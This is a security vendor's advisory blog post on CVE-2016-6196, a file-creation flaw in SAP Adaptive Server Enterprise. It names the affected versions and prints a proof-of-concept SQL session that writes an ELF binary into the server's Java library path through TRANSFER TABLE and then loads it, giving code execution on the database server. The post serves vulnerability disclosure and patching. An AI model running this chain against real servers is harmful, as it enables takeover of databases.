Join Trustwave at the 2023 Gartner Security & Risk Management Summit in London, September 26-28. Learn More

Join Trustwave at the 2023 Gartner Security & Risk Management Summit in London, September 26-28. Learn More

Managed Detection & Response

Eradicate cyberthreats with world-class intel and expertise

Managed Security Services

Expand your team’s capabilities and strengthen your security posture

Consulting & Professional Services

Tap into our global team of tenured cybersecurity specialists

Penetration Testing

Subscription- or project-based testing, delivered by global experts

Database Security

Get ahead of database risk, protect data and exceed compliance requirements

Email Security & Management

Catch email threats others miss with layered security & maximum control

Co-Managed SOC (SIEM)

Eliminate alert fatigue, focus your SecOps team, stop threats fast, and reduce cyber risk

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
The Trustwave Approach
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Platform
SpiderLabs Fusion Center
Security Operations Centers
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

SAP ASE file creation vulnerability (CVE-2016-6196)

Recently SAP released a patch for an Adaptive Server Enterprise vulnerability that allows legitimate database users to create files on disk where the server process can write to. This is useful when doing a chained database attack - first create a file which can be a binary (library), then trigger some function within the database server that will load this library and thus execute code in the server's process context (i.e. own the database server). Vulnerable versions of Adaptive Server Enterprise are 15.7 prior to SP137 and 16.0 prior to SP02 PL04.

Any table owner can run TRANSFER TABLE command. Note, however, that the guest user is explicitly prohibited from running the TRANSFER TABLE command. Here is a full proof-of-concept attack against Adaptive Server Enterprise 16.0 SP02 PL03 with Java enabled (don't enable Java if not required!):

1> create table t (val binary(10)) 
2> go
1> insert into t values (0x457f464c..)
2> go
(1 row affected)
1> transfer table t to '/opt/sap/shared/ase/SAPJRE-7_1_027_64BIT/lib/amd64/server/' for bcp
2> go
(1 row affected)
1> quit
1> declare @s java.lang.System
2> select @s = new java.lang.System("s")
3> go

The code requires that the user running it can create tables or owns some table to run the TRANSFER TABLE command. The INSERT populates table with binary data that is actually a malicious ELF file body. Next the binary is saved out to the server's file system using the vulnerable command and later loaded via Java.

It's worth noting that Trustwave reported this issue to SAP long time ago (CVE-2013-6864), it was patched but then surfaced again in recent releases of Adaptive Server Enterprise. As usual, Trustwave database security products contain a check verifying that necessary patches for this as well for other vulnerabilities are applied to your databases.

Please see the Trustwave advisory for more information about this vulnerability: TWSL2016-013